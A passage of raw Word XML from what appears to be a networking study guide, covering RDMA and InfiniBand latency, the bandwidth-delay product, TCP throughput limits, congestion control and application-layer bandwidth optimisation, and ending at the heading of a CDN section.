        <w:t> allows one machine to read and write another machine's memory directly — without involving the remote CPU or OS kernel. This eliminates the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kernel bypass overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> that limits conventional TCP/IP at high bandwidths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001E054" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InfiniBand and RoCE (RDMA over Converged Ethernet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5307D54D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EBC31" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traditional TCP path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6A01B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">Application → System call → Kernel network stack → NIC → Network → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C912D5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>NIC → Kernel network stack → System call → Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E46C4B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Latency: 50–200 µs, CPU overhead: significant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B36D6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="1113956C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RDMA path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3758165E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Application → RDMA library (user space) → NIC (direct DMA) → Network →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EEE96" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>NIC (direct DMA to application memory) → Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3D38C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Latency: 1–5 µs, CPU overhead: near-zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0780A4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RDMA is used in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF0B2B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HPC (High-Performance Computing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> MPI libraries use RDMA for inter-node communication in supercomputers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC2033" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Storage (NVMe-oF):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Access NVMe SSDs on remote servers with near-local latency (~10µs vs ~50ns local, but ~200µs for traditional iSCSI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C2B7B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AI training:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Distributed training (GPT-4, LLaMA) requires high-bandwidth, low-latency communication between GPUs across nodes. NVIDIA's NVLink (intra-node) and InfiniBand HDR (200Gbps, inter-node) with RDMA enable this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CD731" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth-latency combination:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> InfiniBand HDR provides 200Gbps bandwidth with 1–2µs latency. Traditional TCP at 100Gbps has 50–200µs latency. For distributed AI training, the RDMA path is critical — gradient synchronization requires both high bandwidth (transmitting billions of model parameters) and low latency (synchronizing thousands of GPUs efficiently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06282D8C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="7ED22BDA">
          <v:rect id="_x0000_i4477" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6816EB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A442505" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734CD6A7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth = Maximum Rate of Data Transfer (Capacity, not actual throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3BA74" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="06A4E2AA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The Physical Limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E984428" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Copper:   Shannon-Hartley limit → frequency × log₂(1+SNR) → limited by distance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BBFC6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Fiber:    Near-unlimited medium capacity → limited by transceiver electronics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078D18A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Wireless: Spectrum × QAM modulation → limited by SNR, interference, spectrum allocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B8754" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="43538672" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The Bandwidth-Latency Product (BDP) — The Master Equation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76599096" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  BDP = Bandwidth × RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CCE24" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  = bytes that must be in-flight to fully utilize the link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D1A76" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD037A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  TCP throughput = min(cwnd, rwnd) / RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B144C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  If min(cwnd, rwnd) &lt; BDP → bandwidth is wasted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C66B32" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B30DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Implication: High-bandwidth + High-latency paths require large TCP buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E3DA3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">               Default OS buffers often insufficient → manual tuning or auto-tuning required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F8E9F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="77BF6611" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Protocol Overhead Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB8122" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Physical (Ethernet): 38 bytes/frame overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285598A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Network (IP):        20-40 bytes/packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CDBA9E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Transport (TCP):     20-32 bytes/segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D46F1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Application (HTTP/1.1): 200-2000 bytes/request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A177C04" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD97F1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Mitigation: Jumbo frames (9000 MTU) reduce per-frame overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAE760" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">              HTTP/2 HPACK reduces per-request header overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AF3CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">              Persistent connections amortize TCP overhead across requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277762C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="2A153054" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Congestion Control Algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBDDA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  CUBIC:  Loss-based, AIMD, good for moderate BDP paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A35963" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">          Sawtooth cwnd pattern, slow recovery after loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8FF42" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  BBR:    Model-based, estimates BtlBw and RTprop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07556E15" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">          Fills pipe without bufferbloat, much better on high-BDP paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CCCB4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">          75% improvement on high-BDP international paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6149F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="0E81DBBA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The Bandwidth Optimization Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D71862" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Physical:     More spectrum, better modulation, denser fiber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF28B7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Network:      QoS/DSCP, traffic shaping, route optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59C867" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Transport:    Congestion control tuning, buffer sizing, QUIC over TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169DBAE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Application:  Compression (Brotli &gt; gzip, Zstd+dictionary for small messages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D67E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                Binary protocols (Protobuf 3x vs JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04279330" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                CDN caching (95% hit ratio = 20x origin bandwidth reduction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D464790" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                Delta encoding, field filtering, pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C34692F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="51B3EBF1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The Distributed Systems Bandwidth Equations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F5B68" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Replication bandwidth = write_throughput × replication_factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112A357" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Fan-out bandwidth = request_rate × fan_out_factor × avg_response_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1310EC24" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Internal:external cost ratio ≈ 10-100x cheaper internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FE903" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDAD9F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Design principle: move computation to data (not data to computation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE83284" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                    reduces bandwidth by processing at source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6D9BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="383BA45D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The TCP Throughput Formula (why packet loss matters most):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D5DEC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Throughput ≤ MSS / (RTT × √packet_loss_rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A91447" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  0.01% packet loss on 1Gbps/50ms RTT path → max 23 Mbps TCP throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BD711" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Packet loss is more damaging than bandwidth reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF6509C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="7A7F5BAB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Key Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC97A6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Bandwidth    ↔  Latency (high-BDP paths fill bandwidth slowly due to RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49827DC4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Compression  ↔  CPU (more compression = less bandwidth = more CPU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FA677" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Replication  ↔  Bandwidth (more copies = more bandwidth consumed internally)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42010B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Caching      ↔  Freshness (longer TTL = higher hit ratio = less origin bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EC65B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Protocol efficiency ↔  Flexibility (Protobuf saves bandwidth but reduces debuggability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C7637" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  QoS priority ↔  Fairness (prioritizing some flows deprives others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFD7D9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth is not a fixed resource that you either have enough of or don't — it is a dynamic constraint that interacts with latency, protocol design, traffic patterns, and application semantics in non-obvious ways.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A 10Gbps link can deliver 100Mbps of effective throughput to an application with the wrong TCP buffer configuration. A 1Gbps link can be fully utilized with the right congestion control algorithm. A 10TB dataset can be transferred over a 1Gbps intercontinental link faster by shipping a physical hard drive (FedEx has a higher bandwidth than the internet for large, latency-tolerant transfers) than by TCP transfer. The engineering judgment — knowing when bandwidth is the actual bottleneck, when it's latency masquerading as bandwidth, when it's protocol overhead, or when it's application-layer inefficiency — is what distinguishes experienced systems engineers from those who simply throw more bandwidth at problems. The most impactful bandwidth optimizations are almost always at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (compression, caching, protocol selection) rather than at the physical layer (buying more bandwidth) — because application-layer changes affect all traffic while physical layer changes only raise the ceiling that application-layer inefficiency prevents you from reaching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74031F3A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00487CAD"/>
    <w:p w14:paraId="1260358C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN (Content Delivery Network) — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF2ED64" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="241063E6">
          <v:rect id="_x0000_i4549" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
